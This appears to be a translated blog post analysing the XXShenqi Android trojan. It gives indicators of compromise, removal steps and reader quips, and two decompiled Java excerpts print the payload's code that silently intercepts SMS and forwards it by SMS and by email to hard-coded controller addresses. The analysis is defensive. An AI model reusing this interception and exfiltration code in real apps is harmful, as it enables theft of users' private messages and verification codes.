Note: an earlier version of this article's title and body mistakenly wrote XXShenqi as XXZhushou; that was a slip of the author's hand, thinking of a different app, 233
Virus fingerprint
Dropper package name: com.example.xxshenqi
Dropper MD5: 5956c29ce2e17f49a71ac8526dd9cde3
Payload package name: com.example.com.android.trogoogle
Payload MD5: b0dea6906329c47edbecd48adc15a996
If you receive a text from a friend reading "XX看这个,http://cdn.yyupload.com/down/4279193/XXshenqi.apk" ("XX, look at this" plus the link), do not open it under any circumstances: it is a mobile virus that steals user information.
At the time of writing, none of the mainstream mobile security products detect or remove this virus, so it is in a 0day outbreak state. Security software with a permission-management feature can block the SMS sending, but cannot block the email sending (unless the app is denied network access altogether).
It is, frankly, a very poorly written virus, on the level of the VB script kiddies of the PC era.
Virus behavior
Reverse analysis shows the virus does the following:
- After the dropper (XX神器) is installed, it induces the user to install a "resource pack", which is the virus payload.
- The payload registers broadcast receivers for boot completion and incoming SMS (requiring android.permission.RECEIVE_BOOT_COMPLETED and android.permission.RECEIVE_SMS; the actual broadcast actions are android.intent.action.BOOT_COMPLETED and android.provider.Telephony.SMS_RECEIVED) so that it starts itself without user interaction.
- The payload accepts command SMS from the phone number 18670259904.
- Every other SMS the payload receives is automatically forwarded by SMS to a phone number (18163657397 in the code below) and by email to [email protected]; the key code follows.
```java
// ..... (earlier part of the receiver's onReceive() not reproduced on the page)
// Decompiled from the payload's SMS receiver. The for(;;)/break/continue
// shape is a decompiler artifact: the unreachable statements after `break`
// and `continue` are the displaced else branches of the two `if`s above.
abortBroadcast(); // swallow the SMS so the user's messaging app never shows it
System.out.println("木马收到非命令短信。发送到控端=============================="); // "trojan got a non-command SMS, send to controller"
SmsManager localSmsManager = SmsManager.getDefault();
String str4;
if (str3.length() != 11) { // str3 = sender; not an 11-digit mobile number, i.e. a short code (bank, Taobao, ...)
    System.out.println("木马觉得淘宝信息=============================="); // "trojan thinks this is Taobao info"
    str4 = "【特殊消息】" + str2; // str2 = SMS body, tagged "[special message]"
    if (str4.length() > 60) {
        // too long for one forwarded SMS: split in two and send both to the controller's number
        localSmsManager.sendTextMessage("18163657397", null, str4.substring(0, str4.length() / 2), null, null);
        localSmsManager.sendTextMessage("18163657397", null, str4.substring(1 + str4.length() / 2), null, null);
    }
}
for (;;) {
    // after forwarding, kill its own process one second later
    new Thread() {
        public void run() {
            System.out.println("木马Sleep(1000)==============================");
            try {
                Thread.sleep(1000L);
                System.out.println("木马killProcess================\t");
                Process.killProcess(Process.myPid());
                return;
            } catch (InterruptedException localInterruptedException) {
                for (;;) {
                    localInterruptedException.printStackTrace();
                }
            }
        }
    }.start();
    break;
    // displaced else of `if (str4.length() > 60)`: short message forwarded whole
    localSmsManager.sendTextMessage("18163657397", null, str4, null, null);
    continue;
    // displaced else of `if (str3.length() != 11)`: sender is an ordinary number
    // (the assignment to str4 for this branch was apparently lost in decompilation)
    System.out.println("木马觉得是普通信息=============================="); // "trojan thinks this is an ordinary message"
}
// .....
```
```java
// Decompiled IntentService that mails the captured SMS text to the controller
// through QQ's SMTP server. Host, port and password are hard-coded in the APK;
// the sending account itself is set elsewhere and redacted on this page.
protected void onHandleIntent(Intent paramIntent) {
    System.out.println("木马进入MySendEmailService==============================");
    String str = paramIntent.getStringExtra("String"); // the SMS text handed over by the receiver
    System.out.println("木马开始发送邮件============================");
    MailSenderInfo localMailSenderInfo = new MailSenderInfo();
    localMailSenderInfo.setMailServerHost("smtp.qq.com");
    localMailSenderInfo.setMailServerPort("25");
    localMailSenderInfo.setValidate(true);
    localMailSenderInfo.setPassword("lishulili."); // hard-coded mailbox password
    localMailSenderInfo.setSubject("信息"); // subject: "message"
    localMailSenderInfo.setContent(str);
    // the same content is sent twice, once as plain text and once as HTML
    new SimpleMailSender().sendTextMail(localMailSenderInfo);
    SimpleMailSender.sendHtmlMail(localMailSenderInfo);
    System.out.println("木马完成发送邮件=============================");
    System.out.println("木马离开MySendEmailService=============================");
    System.out.println("木马killProcess==============================");
    Process.killProcess(Process.myPid()); // exit so no process lingers in the task list
}
```
Removal
Go to Settings -> Apps and uninstall the app named XX神器 and the app com.android.Trogoogle (package com.example.com.android.trogoogle).
Change the passwords of all your accounts as soon as possible.
Does the first paragraph count as a subtle burn?
As long as you get it [not really
_(:з”∠)_ This "virus" is written rather nobly too, huh
_(:з”∠)_